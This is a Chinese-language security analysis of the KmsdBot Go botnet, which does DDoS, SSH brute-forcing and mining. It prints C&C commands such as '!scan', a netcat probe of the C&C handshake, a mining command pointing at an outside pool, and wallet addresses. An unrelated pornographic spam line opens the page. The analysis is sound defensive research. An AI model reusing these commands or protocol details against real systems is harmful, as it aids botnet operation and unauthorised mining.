自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

又一個 Golang 編寫的僵尸網(wǎng)絡(luò):KmsdBot

作者:Avenger
安全
Akamai 最近通過全球部署的蜜罐,發(fā)現(xiàn)了一個為游戲行業(yè)量身定制的具有 DDoS 能力與加密貨幣挖掘能力的僵尸網(wǎng)絡(luò) KmsdBot。

又一個 Golang 編寫的僵尸網(wǎng)絡(luò):KmsdBot

Akamai 最近通過全球部署的蜜罐,發(fā)現(xiàn)了一個為游戲行業(yè)量身定制的具有 DDoS 能力與加密貨幣挖掘能力的僵尸網(wǎng)絡(luò) KmsdBot。

發(fā)現(xiàn) KmsdBot

由于蜜罐是對外開放的,會有大量的攻擊行為被發(fā)現(xiàn),其中有很多下載惡意軟件的命令。其中有一個引起了分析人員的注意:

image.png-337.8kB

下載日志

攻擊者利用 FTP 下載所需的惡意樣本,F(xiàn)TP 服務(wù)器上還有很多其他樣本。

image.png-192.7kB

支持各種架構(gòu)

從目錄上看惡意軟件支持各種 CPU 架構(gòu),但其實有些包含二進制文件,有些是空目錄。攻擊者可能在陸續(xù)擴展所支持的架構(gòu),擴大攻擊目標范圍。

download.php 腳本中包含惡意代碼,用于在 Web 服務(wù)器上下載惡意軟件。

image.png-264.7kB

惡意代碼

部分架構(gòu)(如 x86_64 和 386)下有惡意樣本能夠下載,如下所示:

image.png-79kB

大小相似的二進制文件似乎是同一惡意軟件代碼的修改版

這些樣本都是 Go 開發(fā)的二進制文件:

client: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, Go BuildID=ob_PyXeD8H4173aDP-NM/Z7DzwyNXZ8c1Wr7LyTOK/t8bg8nky3tdpKdKSAvyp/_nWexL6rk1sZt5hRLfgs, with debug_info, not stripped
ksmdm: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, Go BuildID=lmjZVXbGVxjEutEAYziK/ak2EoKWzPPmCz2ipOltK/uKypKwO7m2jjT2AT0qnG/PiKIqd334XYNEl_likc3, with debug_info, not stripped
ksmds: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, Go BuildID=CV7cqV3r6hVM05Ma2jpB/kc_FWOhPv8HtKZQUhiUi/jrGTR9lhjVWxp-9kHdDA/ev1S8rMmqqwjpvWz4sLX, with debug_info, not stripped
ksmdx: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, Go BuildID=S65yXt0R7hEC1YEm5Ci7/qGG-jP6bpvA1TCgQwZoV/WpM491XNek0FReOrQmX_/EMNmhh6mJI8ycZhLPtP4, with debug_info, not stripped
kxmd: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, Go BuildID=57pm413aVTQ8gOrUjHox/DwlgdSzYxLxitlBpe0OR/hdbtJaHv8ujFruku5AIJ/RrSUbVKsJ9wj-rBopzh3, with debug_info, not stripped
kzmd: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, Go BuildID=2FTLNIjq7bgMnSOW0NhD/YBc64Ubft703RycI5yQL/85YkVXL_eseyGJG3XHm1/M_laLRa5tNb5oeZ24ROq, with debug_info, not stripped

分析

這些二進制文件的包名稱都是 /root/client,這意味著它們可能都是相同的惡意軟件,只是版本不同。他們中有一個文件能夠完成 C&C 通信、軟件更新與加密貨幣挖掘,另一個文件可以進行攻擊。

$ diff client.source ksmdm.source
19,23c19,23
< start Lines: 12 to 28 (16)
< startfunc1 Lines: 19 to 30 (11)
< startfunc2 Lines: 22 to 22 (0)
< udpclimb Lines: 30 to 60 (30)

< tcpclimb Lines: 60 to 88 (28)

start Lines: 10 to 26 (16)
startfunc1 Lines: 17 to 28 (11)
startfunc2 Lines: 20 to 20 (0)
udpclimb Lines: 28 to 58 (30)
tcpclimb Lines: 58 to 86 (28)

惡意軟件的攻擊目標是一家名為 FiveM 的游戲公司,支持用戶為 Grand Theft Auto Online 部署自定義私服。下圖為樣本打開 UDP 套接字后,使用 FiveM Token 構(gòu)建數(shù)據(jù)包,浪費服務(wù)器資源。

image.png-790.1kB

構(gòu)建數(shù)據(jù)包

掃描傳播

ksmdx 樣本中包含掃描、更新與挖礦的功能:

Package main: /root/client
File: client.go
(*Client)Recv Lines: 23 to 34 (11)
(*Client)Handle Lines: 34 to 52 (18)
(*Client).Handlefunc1 Lines: 35 to 35 (0)
File: command.go
NewCommand Lines: 15 to 32 (17)
(*Command)Handle Lines: 32 to 62 (30)
File: commandfunctions.go
ShellExec Lines: 11 to 23 (12)
scan Lines: 23 to 50 (27)
stopscan Lines: 50 to 69 (19)
updateminer Lines: 69 to 108 (39)
stopmine Lines: 108 to 127 (19)
updateclient Lines: 127 to 159 (32)
File: main.go
main Lines: 8 to 16 (8)
File: methods.go
start Lines: 12 to 28 (16)
startfunc1 Lines: 19 to 30 (11)
startfunc2 Lines: 22 to 22 (0)
udpclimb Lines: 30 to 60 (30)
tcpclimb Lines: 60 to 88 (28)
File: utils.go
randomwallet Lines: 73 to 79 (6)
envname Lines: 79 to 129 (50)

ksmdx 會向 C&C 服務(wù)器發(fā)送 Bruh Started:的 HTTP POST 請求,以此進行失陷主機上線。

$./ksmdx 192.168.0.14 /ksmdm 192.168.0.14 kumd kxmds

HTTP 日志中的請求為:

192.168.0.44 - - [20/Oct/2022:13:09:34 -0400] "GET /ksmdm HTTP/1.1" 200 2904330 "-" "Go-http-client/1.1"

在 45833 端口上可以看到 POST 請求:

image.png-36.1kB

POST 請求

向 C&C 服務(wù)器發(fā)送 !scan 命令即可獲取 SSH 服務(wù)憑據(jù)爆破列表:

image.png-76.1kB

爆破列表

!scan xxx.xxx.xxx.xxx xxx.xxx.xxx.xxx/win/kzmds xxx.xxx.xxx.xxx kvmd kmsd

C&C 通信

蜜罐日志中能夠看到惡意軟件從一個新的 IP 地址對蜜罐發(fā)起攻擊,上傳了新的惡意樣本,內(nèi)置了新的 C&C IP 地址。

[pid 18212] connect(3, {sa_family=AF_INET, sin_port=htons(51382), sin_addr=inet_addr("xxx.xxx.xxx.xxx")}, 16) = -1 EINPROGRESS (Operation now in progress)
[pid 1047] connect(4, {sa_family=AF_INET, sin_port=htons(51388), sin_addr=inet_addr("xxx.xxx.xxx.xxx")}, 16) = -1 EINPROGRESS (Operation now in progress)

查看流量可以發(fā)現(xiàn)失陷主機使用空字節(jié)初始化連接,C&C 服務(wù)器響應(yīng) 0x01,隨后失陷主機返回 0x02。

[pid 2514865] write(4, "0x02", 4) = 4
And 0x01 is the response
xxx.xxx.xxx.xxx.51388 > xxx.xxx.xxx.xxx.52280: Flags [P.], cksum 0xf2b4 (correct), seq 20:24, ack 21, win 510, options [nop,nop,TS val 1019359456 ecr 4067014838], length 4
0x0000:  4500 0038 adf3 4000 3a06 9b4a ab16 1e1f  E..8..@.:..J....
0x0010:  c63a 6812 c8bc cc38 81f9 f90a abeb 552a  .:h....8......U*
0x0020:  8018 01fe f2b4 0000 0101 080a 3cc2 30e0  ............<.0.
0x0030:  f269 b8b6 3078 3031                      .i..0x01

使用 netcat 可以進行簡單測試:

$ echo "0x00" | nc xxx.xxx.xxx.xxx 51388
0x01
[pid 2516369] write(4, "0x00", 4) = 4
It looks like 0x02 is the heartbeat
xxx.xxx.xxx.xxx.52280 > xxx.xxx.xxx.xxx.51388: Flags [P.], cksum 0xf7ac (incorrect -> 0xd616), seq 57:61, ack 57, win 502, options [nop,nop,TS val 4066922833 ecr 1019262337], length 4
0x0000:  4500 0038 3010 4000 4006 132e c63a 6812  E..80.@.@....:h.
0x0010:  ab16 1e1f cc38 c8bc abeb 54de 81f9 f8c2  .....8....T.....
0x0020:  8018 01f6 f7ac 0000 0101 080a f268 5151  .............hQQ
0x0030:  3cc0 b-581 3078 3032                      <...0x02

通信流量如下所示:

% telnet xxx.xxx.xxx.xxx 57388
Trying xxx.xxx.xxx.xxx...
Connected to xxx.xxx.xxx.xxx.
Escape character is '^]'.
0x00
0x010x02
0x010x02
0x010x02
0x010x02
0x010x02
0x01

挖礦

sym.main.randomwallet() 函數(shù)中內(nèi)置了數(shù)個錢包地址,在連接礦池時會隨機選擇。分析人員在分析時,并未發(fā)現(xiàn)任何挖礦行為,僵尸網(wǎng)絡(luò)只進行了 DDoS 攻擊。當然,攻擊者仍然可以通過 ./ksmdr -o pool.hashvault.pro 命令來啟動挖礦。

 │? 0x0065b6b0 488d05356c08. lea rax, [0x006e22ec] ; "42WDUXX5UYtNf9DyboNRx6TgNrJD43QfgTvEjh8djtdKVoNppnN96Nz8sVp2wWJTQgW9e8XjFLkv6KpSEgwWbLXLMKn5wwg42vGrE1WDpKgue8Y9ewpi6gXupMqDqYi"
 │? 0x0065b6b7 4889442428 mov qword [var_28h], rax
 │? 0x0065b6bc 48c74424305f. mov qword [var_30h], 0x5f ; '_'
 │? ; [0x5f:8]=-1 ; 95
 │? 0x0065b6c5 488d053d6d08. lea rax, [0x006e2409] ; "46DBehyheMSatgdGffv8SVAEK8ts6Ur4wToVNL99Yqo6ZGnv7q4QpaxG7YnaasngPvN1rbyxYyCZAABgyXyme92wRMaVn1V3617de4a96262c6f5d9e98bf9292dc29"
 │? 0x0065b6cc 4889442438 mov qword [var_38h], rax
 │? 0x0065b6d1 48c74424405f. mov qword [var_40h], 0x5f ; '_'
 │? ; [0x5f:8]=-1 ; 95
 │? 0x0065b6da 488d05c96c08. lea rax, [0x006e23aa] ; "45yK4gR5QCNag2X4g6ss6PUiL4s1e929b8mev4Rz3CbiTPU9NSXYHiyPL9FMi6cDVvD7EKho4atUf82s3vkVfFXNSsMqyUE46DBehyheMSatgdGffv8SVAEK8ts6Ur4"
 │? 0x0065b6e1 4889442448 mov qword [var_48h], rax
 │? 0x0065b6e6 48c74424505f. mov qword [var_50h], 0x5f ; '_'
 │? ; [0x5f:8]=-1 ; 95
 │? 0x0065b6ef 488d05556c08. lea rax, [0x006e234b] ; "42vGrE1WDpKgue8Y9ewpi6gXupMqDqYiKV4EwM7CFZFuNdRKP3dG6rADE7DRAcoEWGY6LmgCRKAiX16wGAu3Tj4mMQ9HR5B45yK4gR5QCNag2X4g6ss6PUiL4s1e929"

對樣本分析后,可以確定很多文件都是同一代碼庫的不同版本,僵尸網(wǎng)絡(luò)仍然在積極迭代更新。

$ diff reports/kxmd/kxmd-src.txt reports/75569874dadb814ce51d121c108ead006b0f39c27057945b649837563f635f51/75569874dadb814ce51d121c108ead006b0f39c27057945b649837563f635f51-src.txt
8c8

< (*Command)Handle Lines: 32 to 136 (104)

(*Command)Handle Lines: 32 to 144 (112)
11,18c11,20
< scan Lines: 23 to 50 (27)
< stopscan Lines: 50 to 69 (19)
< updateminer Lines: 69 to 108 (39)
< stopmine Lines: 108 to 127 (19)
< updateclient Lines: 127 to 161 (34)
< loadclient Lines: 161 to 180 (19)
< startminer Lines: 180 to 193 (13)

< reloadminer Lines: 193 to 208 (15)

scan Lines: 23 to 52 (29)
startscan Lines: 52 to 75 (23)
stopscan Lines: 75 to 97 (22)
updateminer Lines: 97 to 144 (47)
stopmine Lines: 144 to 166 (22)
updateclient Lines: 166 to 202 (36)
loadclient Lines: 202 to 221 (19)
removefile Lines: 221 to 235 (14)
startminer Lines: 235 to 248 (13)
reloadminer Lines: 248 to 264 (16)
54,60c56,62
< getrandpath Lines: 12 to 62 (50)
< get Lines: 62 to 109 (47)
< fivem Lines: 109 to 156 (47)
< fivemguid Lines: 156 to 204 (48)
< post1 Lines: 204 to 255 (51)
< post Lines: 255 to 344 (89)

< bigdata Lines: 344 to 386 (42)

getrandpath Lines: 11 to 61 (50)
get Lines: 61 to 108 (47)
fivem Lines: 108 to 158 (50)
fivemguid Lines: 158 to 206 (48)
post1 Lines: 206 to 257 (51)
post Lines: 257 to 346 (89)
bigdata Lines: 346 to 388 (42)

攻擊流量分析

在四層 TCP/UDP 攻擊數(shù)據(jù)包中,隨機數(shù)據(jù)作為 Payload。在七層 HTTP 攻擊數(shù)據(jù)包中,針對特定路徑發(fā)起 GET/POST 請求。

image.png-344.2kB

攻擊請求

image.png-116kB

攻擊請求

image.png-163kB

攻擊請求

在函數(shù) sym.main.connect() 中定義了 C&C 通信,如下所示:

image.png-1029.1kB

C&C 通信

image.png-211.6kB

C&C 通信

image.png-302.1kB

TCP 洪水數(shù)據(jù)包

結(jié)論

KmsdBot 最初針對游戲公司進行攻擊,目前已經(jīng)轉(zhuǎn)向大型奢侈品品牌。盡管攻擊方式仍然是原始的 SSH 服務(wù)爆破,但仍然應(yīng)該引起注意。

責任編輯:趙寧寧 來源: FreeBuf.COM
DDoS僵尸網(wǎng)絡(luò)
相關(guān)推薦

2022-02-06 20:55:39

jsEsbuild項目

2020-02-18 20:28:23

AI人工智能

2023-05-14 23:38:43

Glarity用戶視頻

2014-12-01 12:57:46

亞馬遜天貓海淘

2014-10-11 09:15:36

2012-04-12 09:53:02

2017-08-31 10:32:35

交付技術(shù)

2021-12-29 18:18:59

開源MedusaShopify

2009-04-22 15:16:30

2021-01-29 09:07:39

數(shù)據(jù)保護信息安全數(shù)據(jù)隱私

2011-08-16 17:36:50

SolarisIllumos

2012-06-25 10:20:22

敏捷開發(fā)

2013-04-12 09:24:26

2018-09-30 08:00:15

區(qū)塊鏈碳排放氣候

2022-12-15 10:44:35

2020-07-23 08:24:14

CSS偽類選擇器

2022-07-27 12:07:58

云計算公有云云支出

2009-08-17 08:54:56

2015-07-09 14:41:15

2015-12-09 16:21:41

點贊
收藏

51CTO技術(shù)棧公眾號